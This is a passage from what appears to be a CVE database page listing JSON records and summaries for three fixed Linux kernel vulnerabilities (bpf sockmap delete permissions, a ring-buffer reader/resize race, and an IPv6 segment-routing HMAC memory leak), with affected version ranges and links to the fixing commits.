                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "6.1.85",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "6.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.4.274",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.8.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Allow delete from sockmap/sockhash only if update is allowed\n\nWe have seen an influx of syzkaller reports where a BPF program attached to\na tracepoint triggers a locking rule violation by performing a map_delete\non a sockmap/sockhash.\n\nWe don\u0027t intend to support this artificial use scenario. Extend the\nexisting verifier allowed-program-type check for updating sockmap/sockhash\nto also cover deleting from a map.\n\nFrom now on only BPF programs which were previously allowed to update\nsockmap/sockhash can delete from these map types."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:56.599Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/29467edc23818dc5a33042ffb4920b49b090e63d"
        },
        {
          "url": "https://git.kernel.org/stable/c/11e8ecc5b86037fec43d07b1c162e233e131b1d9"
        },
        {
          "url": "https://git.kernel.org/stable/c/6693b172f008846811f48a099f33effc26068e1e"
        },
        {
          "url": "https://git.kernel.org/stable/c/000a65bf1dc04fb2b65e2abf116f0bc0fc2ee7b1"
        },
        {
          "url": "https://git.kernel.org/stable/c/b81e1c5a3c70398cf76631ede63a03616ed1ba3c"
        },
        {
          "url": "https://git.kernel.org/stable/c/98e948fb60d41447fd8d2d0c3b8637fc6b6dc26d"
        }
      ],
      "title": "bpf: Allow delete from sockmap/sockhash only if update is allowed",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38662",
    "datePublished": "2024-06-21T11:15:12.202Z",
    "dateReserved": "2024-06-21T10:12:11.509Z",
    "dateUpdated": "2025-05-04T12:56:56.599Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38601 (GCVE-0-2024-38601)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:48 – Updated: 2025-11-04 17:21

Title

ring-buffer: Fix a race between readers and resize checks

Summary

In the Linux kernel, the following vulnerability has been resolved: ring-buffer: Fix a race between readers and resize checks The reader code in rb_get_reader_page() swaps a new reader page into the ring buffer by doing cmpxchg on old->list.prev->next to point it to the new page. Following that, if the operation is successful, old->list.next->prev gets updated too. This means the underlying doubly-linked list is temporarily inconsistent, page->prev->next or page->next->prev might not be equal back to page for some page in the ring buffer. The resize operation in ring_buffer_resize() can be invoked in parallel. It calls rb_check_pages() which can detect the described inconsistency and stop further tracing: [ 190.271762] ------------[ cut here ]------------ [ 190.271771] WARNING: CPU: 1 PID: 6186 at kernel/trace/ring_buffer.c:1467 rb_check_pages.isra.0+0x6a/0xa0 [ 190.271789] Modules linked in: [...] [ 190.271991] Unloaded tainted modules: intel_uncore_frequency(E):1 skx_edac(E):1 [ 190.272002] CPU: 1 PID: 6186 Comm: cmd.sh Kdump: loaded Tainted: G E 6.9.0-rc6-default #5 158d3e1e6d0b091c34c3b96bfd99a1c58306d79f [ 190.272011] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552c-rebuilt.opensuse.org 04/01/2014 [ 190.272015] RIP: 0010:rb_check_pages.isra.0+0x6a/0xa0 [ 190.272023] Code: [...] [ 190.272028] RSP: 0018:ffff9c37463abb70 EFLAGS: 00010206 [ 190.272034] RAX: ffff8eba04b6cb80 RBX: 0000000000000007 RCX: ffff8eba01f13d80 [ 190.272038] RDX: ffff8eba01f130c0 RSI: ffff8eba04b6cd00 RDI: ffff8eba0004c700 [ 190.272042] RBP: ffff8eba0004c700 R08: 0000000000010002 R09: 0000000000000000 [ 190.272045] R10: 00000000ffff7f52 R11: ffff8eba7f600000 R12: ffff8eba0004c720 [ 190.272049] R13: ffff8eba00223a00 R14: 0000000000000008 R15: ffff8eba067a8000 [ 190.272053] FS: 00007f1bd64752c0(0000) GS:ffff8eba7f680000(0000) knlGS:0000000000000000 [ 190.272057] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 190.272061] CR2: 00007f1bd6662590 CR3: 000000010291e001 CR4: 0000000000370ef0 [ 190.272070] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 190.272073] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 190.272077] Call Trace: [ 190.272098] <TASK> [ 190.272189] ring_buffer_resize+0x2ab/0x460 [ 190.272199] __tracing_resize_ring_buffer.part.0+0x23/0xa0 [ 190.272206] tracing_resize_ring_buffer+0x65/0x90 [ 190.272216] tracing_entries_write+0x74/0xc0 [ 190.272225] vfs_write+0xf5/0x420 [ 190.272248] ksys_write+0x67/0xe0 [ 190.272256] do_syscall_64+0x82/0x170 [ 190.272363] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ 190.272373] RIP: 0033:0x7f1bd657d263 [ 190.272381] Code: [...] [ 190.272385] RSP: 002b:00007ffe72b643f8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 [ 190.272391] RAX: ffffffffffffffda RBX: 0000000000000002 RCX: 00007f1bd657d263 [ 190.272395] RDX: 0000000000000002 RSI: 0000555a6eb538e0 RDI: 0000000000000001 [ 190.272398] RBP: 0000555a6eb538e0 R08: 000000000000000a R09: 0000000000000000 [ 190.272401] R10: 0000555a6eb55190 R11: 0000000000000246 R12: 00007f1bd6662500 [ 190.272404] R13: 0000000000000002 R14: 00007f1bd6667c00 R15: 0000000000000002 [ 190.272412] </TASK> [ 190.272414] ---[ end trace 0000000000000000 ]--- Note that ring_buffer_resize() calls rb_check_pages() only if the parent trace_buffer has recording disabled. Recent commit d78ab792705c ("tracing: Stop current tracer when resizing buffer") causes that it is now always the case which makes it more likely to experience this issue. The window to hit this race is nonetheless very small. To help reproducing it, one can add a delay loop in rb_get_reader_page(): ret = rb_head_page_replace(reader, cpu_buffer->reader_page); if (!ret) goto spin; for (unsigned i = 0; i < 1U << 26; i++) /* inserted delay loop */ __asm__ __volatile__ ("" : : : "memory"); rb_list_head(reader->list.next)->prev = &cpu_buffer->reader_page->list; .. ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b50932ea673b5a089…
	https://git.kernel.org/stable/c/c68b7a442ee61d04c…
	https://git.kernel.org/stable/c/1e160196042cac946…
	https://git.kernel.org/stable/c/595363182f28786d6…
	https://git.kernel.org/stable/c/54c64967ba5f8658a…
	https://git.kernel.org/stable/c/af3274905b3143ea2…
	https://git.kernel.org/stable/c/5ef9e330406d3fb4f…
	https://git.kernel.org/stable/c/79b52013429a42b8e…
	https://git.kernel.org/stable/c/c2274b908db055299…

Impacted products

Vendor

Product

Version

Linux

Affected: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 , < b50932ea673b5a089a4bb570a8a868d95c72854e (git)
Affected: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 , < c68b7a442ee61d04ca58b2b5cb5ea7cb8230f84a (git)
Affected: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 , < 1e160196042cac946798ac192a0bc3398f1aa66b (git)
Affected: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 , < 595363182f28786d641666a09e674b852c83b4bb (git)
Affected: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 , < 54c64967ba5f8658ae7da76005024ebd3d9d8f6e (git)
Affected: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 , < af3274905b3143ea23142bbf77bd9b610c54e533 (git)
Affected: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 , < 5ef9e330406d3fb4f4b2c8bca2c6b8a93bae32d1 (git)
Affected: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 , < 79b52013429a42b8efdb0cda8bb0041386abab87 (git)
Affected: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 , < c2274b908db05529980ec056359fae916939fdaa (git)

Linux

Affected: 3.5
Unaffected: 0 , < 3.5 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:21:44.865Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b50932ea673b5a089a4bb570a8a868d95c72854e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c68b7a442ee61d04ca58b2b5cb5ea7cb8230f84a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1e160196042cac946798ac192a0bc3398f1aa66b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/595363182f28786d641666a09e674b852c83b4bb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/54c64967ba5f8658ae7da76005024ebd3d9d8f6e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/af3274905b3143ea23142bbf77bd9b610c54e533"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5ef9e330406d3fb4f4b2c8bca2c6b8a93bae32d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/79b52013429a42b8efdb0cda8bb0041386abab87"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c2274b908db05529980ec056359fae916939fdaa"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38601",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:13:21.471342Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:54.075Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/trace/ring_buffer.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b50932ea673b5a089a4bb570a8a868d95c72854e",
              "status": "affected",
              "version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
              "versionType": "git"
            },
            {
              "lessThan": "c68b7a442ee61d04ca58b2b5cb5ea7cb8230f84a",
              "status": "affected",
              "version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
              "versionType": "git"
            },
            {
              "lessThan": "1e160196042cac946798ac192a0bc3398f1aa66b",
              "status": "affected",
              "version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
              "versionType": "git"
            },
            {
              "lessThan": "595363182f28786d641666a09e674b852c83b4bb",
              "status": "affected",
              "version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
              "versionType": "git"
            },
            {
              "lessThan": "54c64967ba5f8658ae7da76005024ebd3d9d8f6e",
              "status": "affected",
              "version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
              "versionType": "git"
            },
            {
              "lessThan": "af3274905b3143ea23142bbf77bd9b610c54e533",
              "status": "affected",
              "version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
              "versionType": "git"
            },
            {
              "lessThan": "5ef9e330406d3fb4f4b2c8bca2c6b8a93bae32d1",
              "status": "affected",
              "version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
              "versionType": "git"
            },
            {
              "lessThan": "79b52013429a42b8efdb0cda8bb0041386abab87",
              "status": "affected",
              "version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
              "versionType": "git"
            },
            {
              "lessThan": "c2274b908db05529980ec056359fae916939fdaa",
              "status": "affected",
              "version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/trace/ring_buffer.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.5"
            },
            {
              "lessThan": "3.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "3.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "3.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "3.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "3.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "3.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "3.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "3.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "3.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nring-buffer: Fix a race between readers and resize checks\n\nThe reader code in rb_get_reader_page() swaps a new reader page into the\nring buffer by doing cmpxchg on old-\u003elist.prev-\u003enext to point it to the\nnew page. Following that, if the operation is successful,\nold-\u003elist.next-\u003eprev gets updated too. This means the underlying\ndoubly-linked list is temporarily inconsistent, page-\u003eprev-\u003enext or\npage-\u003enext-\u003eprev might not be equal back to page for some page in the\nring buffer.\n\nThe resize operation in ring_buffer_resize() can be invoked in parallel.\nIt calls rb_check_pages() which can detect the described inconsistency\nand stop further tracing:\n\n[  190.271762] ------------[ cut here ]------------\n[  190.271771] WARNING: CPU: 1 PID: 6186 at kernel/trace/ring_buffer.c:1467 rb_check_pages.isra.0+0x6a/0xa0\n[  190.271789] Modules linked in: [...]\n[  190.271991] Unloaded tainted modules: intel_uncore_frequency(E):1 skx_edac(E):1\n[  190.272002] CPU: 1 PID: 6186 Comm: cmd.sh Kdump: loaded Tainted: G            E      6.9.0-rc6-default #5 158d3e1e6d0b091c34c3b96bfd99a1c58306d79f\n[  190.272011] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552c-rebuilt.opensuse.org 04/01/2014\n[  190.272015] RIP: 0010:rb_check_pages.isra.0+0x6a/0xa0\n[  190.272023] Code: [...]\n[  190.272028] RSP: 0018:ffff9c37463abb70 EFLAGS: 00010206\n[  190.272034] RAX: ffff8eba04b6cb80 RBX: 0000000000000007 RCX: ffff8eba01f13d80\n[  190.272038] RDX: ffff8eba01f130c0 RSI: ffff8eba04b6cd00 RDI: ffff8eba0004c700\n[  190.272042] RBP: ffff8eba0004c700 R08: 0000000000010002 R09: 0000000000000000\n[  190.272045] R10: 00000000ffff7f52 R11: ffff8eba7f600000 R12: ffff8eba0004c720\n[  190.272049] R13: ffff8eba00223a00 R14: 0000000000000008 R15: ffff8eba067a8000\n[  190.272053] FS:  00007f1bd64752c0(0000) GS:ffff8eba7f680000(0000) knlGS:0000000000000000\n[  190.272057] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[  190.272061] CR2: 00007f1bd6662590 CR3: 000000010291e001 CR4: 0000000000370ef0\n[  190.272070] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[  190.272073] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[  190.272077] Call Trace:\n[  190.272098]  \u003cTASK\u003e\n[  190.272189]  ring_buffer_resize+0x2ab/0x460\n[  190.272199]  __tracing_resize_ring_buffer.part.0+0x23/0xa0\n[  190.272206]  tracing_resize_ring_buffer+0x65/0x90\n[  190.272216]  tracing_entries_write+0x74/0xc0\n[  190.272225]  vfs_write+0xf5/0x420\n[  190.272248]  ksys_write+0x67/0xe0\n[  190.272256]  do_syscall_64+0x82/0x170\n[  190.272363]  entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[  190.272373] RIP: 0033:0x7f1bd657d263\n[  190.272381] Code: [...]\n[  190.272385] RSP: 002b:00007ffe72b643f8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\n[  190.272391] RAX: ffffffffffffffda RBX: 0000000000000002 RCX: 00007f1bd657d263\n[  190.272395] RDX: 0000000000000002 RSI: 0000555a6eb538e0 RDI: 0000000000000001\n[  190.272398] RBP: 0000555a6eb538e0 R08: 000000000000000a R09: 0000000000000000\n[  190.272401] R10: 0000555a6eb55190 R11: 0000000000000246 R12: 00007f1bd6662500\n[  190.272404] R13: 0000000000000002 R14: 00007f1bd6667c00 R15: 0000000000000002\n[  190.272412]  \u003c/TASK\u003e\n[  190.272414] ---[ end trace 0000000000000000 ]---\n\nNote that ring_buffer_resize() calls rb_check_pages() only if the parent\ntrace_buffer has recording disabled. Recent commit d78ab792705c\n(\"tracing: Stop current tracer when resizing buffer\") causes that it is\nnow always the case which makes it more likely to experience this issue.\n\nThe window to hit this race is nonetheless very small. To help\nreproducing it, one can add a delay loop in rb_get_reader_page():\n\n ret = rb_head_page_replace(reader, cpu_buffer-\u003ereader_page);\n if (!ret)\n \tgoto spin;\n for (unsigned i = 0; i \u003c 1U \u003c\u003c 26; i++)  /* inserted delay loop */\n \t__asm__ __volatile__ (\"\" : : : \"memory\");\n rb_list_head(reader-\u003elist.next)-\u003eprev = \u0026cpu_buffer-\u003ereader_page-\u003elist;\n\n.. \n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:15:02.077Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b50932ea673b5a089a4bb570a8a868d95c72854e"
        },
        {
          "url": "https://git.kernel.org/stable/c/c68b7a442ee61d04ca58b2b5cb5ea7cb8230f84a"
        },
        {
          "url": "https://git.kernel.org/stable/c/1e160196042cac946798ac192a0bc3398f1aa66b"
        },
        {
          "url": "https://git.kernel.org/stable/c/595363182f28786d641666a09e674b852c83b4bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/54c64967ba5f8658ae7da76005024ebd3d9d8f6e"
        },
        {
          "url": "https://git.kernel.org/stable/c/af3274905b3143ea23142bbf77bd9b610c54e533"
        },
        {
          "url": "https://git.kernel.org/stable/c/5ef9e330406d3fb4f4b2c8bca2c6b8a93bae32d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/79b52013429a42b8efdb0cda8bb0041386abab87"
        },
        {
          "url": "https://git.kernel.org/stable/c/c2274b908db05529980ec056359fae916939fdaa"
        }
      ],
      "title": "ring-buffer: Fix a race between readers and resize checks",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38601",
    "datePublished": "2024-06-19T13:48:13.097Z",
    "dateReserved": "2024-06-18T19:36:34.933Z",
    "dateUpdated": "2025-11-04T17:21:44.865Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39489 (GCVE-0-2024-39489)

Vulnerability from cvelistv5 – Published: 2024-07-10 07:14 – Updated: 2025-05-04 09:16

Title

ipv6: sr: fix memleak in seg6_hmac_init_algo

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv6: sr: fix memleak in seg6_hmac_init_algo seg6_hmac_init_algo returns without cleaning up the previous allocations if one fails, so it's going to leak all that memory and the crypto tfms. Update seg6_hmac_exit to only free the memory when allocated, so we can reuse the code directly.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/afd5730969aec960a…
	https://git.kernel.org/stable/c/4a3fcf53725b70010…
	https://git.kernel.org/stable/c/daf341e0a2318b813…
	https://git.kernel.org/stable/c/61d31ac85b4572d11…
	https://git.kernel.org/stable/c/599a5654215092ac2…
	https://git.kernel.org/stable/c/0e44d6cbe8de98347…
	https://git.kernel.org/stable/c/f6a99ef4e056c20a1…
	https://git.kernel.org/stable/c/efb9f4f19f8e37fde…

Impacted products

Vendor

Product

Version

Linux

Affected: bf355b8d2c30a289232042cacc1cfaea4923936c , < afd5730969aec960a2fee4e5ee839a6014643976 (git)
Affected: bf355b8d2c30a289232042cacc1cfaea4923936c , < 4a3fcf53725b70010d1cf869a2ba549fed6b8fb3 (git)
Affected: bf355b8d2c30a289232042cacc1cfaea4923936c , < daf341e0a2318b813427d5a78788c86f4a7f02be (git)
Affected: bf355b8d2c30a289232042cacc1cfaea4923936c , < 61d31ac85b4572d11f8071855c0ccb4f32d76c0c (git)
Affected: bf355b8d2c30a289232042cacc1cfaea4923936c , < 599a5654215092ac22bfc453f4fd3959c55ea821 (git)
Affected: bf355b8d2c30a289232042cacc1cfaea4923936c , < 0e44d6cbe8de983470c3d2f978649783384fdcb6 (git)
Affected: bf355b8d2c30a289232042cacc1cfaea4923936c , < f6a99ef4e056c20a138a95cc51332b2b96c8f383 (git)
Affected: bf355b8d2c30a289232042cacc1cfaea4923936c , < efb9f4f19f8e37fde43dfecebc80292d179f56c6 (git)

Linux

Affected: 4.10
Unaffected: 0 , < 4.10 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39489",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-10T15:29:00.880316Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-10T15:29:14.835Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:15.940Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/afd5730969aec960a2fee4e5ee839a6014643976"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4a3fcf53725b70010d1cf869a2ba549fed6b8fb3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/daf341e0a2318b813427d5a78788c86f4a7f02be"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/61d31ac85b4572d11f8071855c0ccb4f32d76c0c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/599a5654215092ac22bfc453f4fd3959c55ea821"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0e44d6cbe8de983470c3d2f978649783384fdcb6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f6a99ef4e056c20a138a95cc51332b2b96c8f383"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/efb9f4f19f8e37fde43dfecebc80292d179f56c6"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/seg6_hmac.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "afd5730969aec960a2fee4e5ee839a6014643976",
              "status": "affected",
              "version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
              "versionType": "git"
            },
            {
              "lessThan": "4a3fcf53725b70010d1cf869a2ba549fed6b8fb3",
              "status": "affected",
              "version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
              "versionType": "git"
            },
            {
              "lessThan": "daf341e0a2318b813427d5a78788c86f4a7f02be",
              "status": "affected",
              "version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
              "versionType": "git"
            },
            {
              "lessThan": "61d31ac85b4572d11f8071855c0ccb4f32d76c0c",
              "status": "affected",
              "version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
              "versionType": "git"
            },
            {
              "lessThan": "599a5654215092ac22bfc453f4fd3959c55ea821",
              "status": "affected",
              "version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
              "versionType": "git"
            },
            {
              "lessThan": "0e44d6cbe8de983470c3d2f978649783384fdcb6",
              "status": "affected",
              "version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
              "versionType": "git"
            },
            {
              "lessThan": "f6a99ef4e056c20a138a95cc51332b2b96c8f383",
              "status": "affected",
